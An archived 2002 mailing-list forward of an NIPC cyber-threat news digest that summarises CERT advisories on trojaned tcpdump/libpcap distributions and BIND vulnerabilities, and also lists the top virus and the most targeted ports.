CRIME FW: [Cyber_threats] Daily News 11/15/02

• Previous message: brvarin@private: "Re: CRIME FSB wages war on Chechen websites"
• Next in thread: Kuo, Jimmy: "RE: CRIME FW: [Cyber_threats] Daily News 11/15/02"
• Reply: Kuo, Jimmy: "RE: CRIME FW: [Cyber_threats] Daily News 11/15/02"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----Original Message-----
From: NIPC Watch [mailto:nipcwatch@private] 
Sent: Friday, November 15, 2002 7:29 AM
To: Cyber Threats
Subject: [Cyber_threats] Daily News 11/15/02

November 13, CERT/CC
CERT Advisory CA-2002-30 Trojan Horse tcpdump and libpcap Distributions.
The
CERT/CC has received reports that several of the released source code
distributions of the libpcap and tcpdump packages were modified by an
intruder and contain a Trojan horse. The CERT/CC has received reports
that
some copies of the source code for libpcap, a packet acquisition
library,
and tcpdump, a network sniffer, have been modified by an intruder and
contain a Trojan horse. The Trojan horse version of the tcpdump source
code
distribution contains malicious code that is run when the software is
compiled. This code, executed from the tcpdump configure script, will
attempt to connect (via wget, lynx, or fetch) to port 80/tcp on a fixed
hostname in order to download a shell script named services. In turn,
this
downloaded shell script is executed to generate a C file (conftes.c),
which
is subsequently compiled and run. Source.
http://www.cert.org/advisories/CA-2002-30.html

November 14, CERT/CC
CERT(r) Advisory CA-2002-31 Multiple Vulnerabilities in BIND. Multiple
vulnerabilities with varying impacts have been found in BIND, the
popular
domain name server and client library software package from the Internet
Software Consortium (ISC). Information on these vulnerabilities can be
found
separately in notes published by CERT/CC. Some of these vulnerabilities
may
allow remote attackers to execute arbitrary code with the privileges of
the
user running named, (typically root), or with the privileges of
vulnerable
client applications. The other vulnerabilities will allow remote
attackers
to disrupt the normal operation of DNS name service running on victim
servers. An attacker could execute arbitrary code with the privileges of
the
application that made the request or cause a denial of service. The
attacker
would need to control the contents of DNS responses, possibly by
spoofing
responses or gaining control of a DNS server. Source.
http://www.cert.org/advisories/CA-2002-31.html

Virus: #1 Virus in USA: WORM_BUGBEAR.A
Source: http://wtc.trendmicro.com/wtc/wmap.html, Trend World Micro Virus
Tracking Center [Infected Computers, North America, Past 24 hours, #1 in
United States]

Top 10 Target Ports
137(netbios-ns); 80(http); 1433(ms-sql-s); 21(ftp); 1080(socks);
25(smtp);
139(netbios-ssn); 445(microsoft-ds); 27374(asp); 111(sunrpc)
Source: http://isc.incidents.org/top10.html; Internet Storm Center


_______________________________________________
Cyber_Threats mailing list
Cyber_Threats@listserv
http://listserv.infragard.org/mailman/listinfo/cyber_threats

• Next message: Kuo, Jimmy: "RE: CRIME FW: [Cyber_threats] Daily News 11/15/02"
• Previous message: brvarin@private: "Re: CRIME FSB wages war on Chechen websites"
• Next in thread: Kuo, Jimmy: "RE: CRIME FW: [Cyber_threats] Daily News 11/15/02"
• Reply: Kuo, Jimmy: "RE: CRIME FW: [Cyber_threats] Daily News 11/15/02"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Nov 15 2002 - 15:08:38 PST